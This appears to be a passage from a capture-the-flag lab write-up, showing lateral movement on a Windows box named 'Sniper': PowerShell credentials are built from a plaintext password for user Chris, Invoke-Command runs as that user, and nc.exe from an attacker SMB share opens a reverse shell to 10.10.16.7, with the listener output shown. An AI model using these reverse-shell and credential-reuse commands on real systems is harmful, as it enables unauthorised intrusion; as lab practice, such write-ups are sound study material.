7 iusr > chris
# cannot connect to mysql
# trying creds for chris
PS C:\windows\System32\spool\drivers\color> $username = "Sniper\Chris"
PS C:\windows\System32\spool\drivers\color> $password = ConvertTo-SecureString '36mEAhz/B8xQ~2VM' -AsPlainText -Force
PS C:\windows\System32\spool\drivers\color> $creds = New-Object System.Management.Automation.PSCredential($username, $password)
PS C:\windows\System32\spool\drivers\color> Start-Process "C:\windows\System32\spool\drivers\color\kashz.exe" -Credential $creds
PS C:\windows\System32\spool\drivers\color> Invoke-Command -ScriptBlock { whoami } -Credential $creds -Computer localhost
sniper\chris
# got shell using
PS> Invoke-Command -ScriptBlock { \\10.10.16.7\drive\nc.exe -e cmd.exe 10.10.16.7 7070 } -Credential $creds -Computer localhost
$ nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.151] 49879
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Chris\Documents>whoami
whoami
sniper\chris
Last updated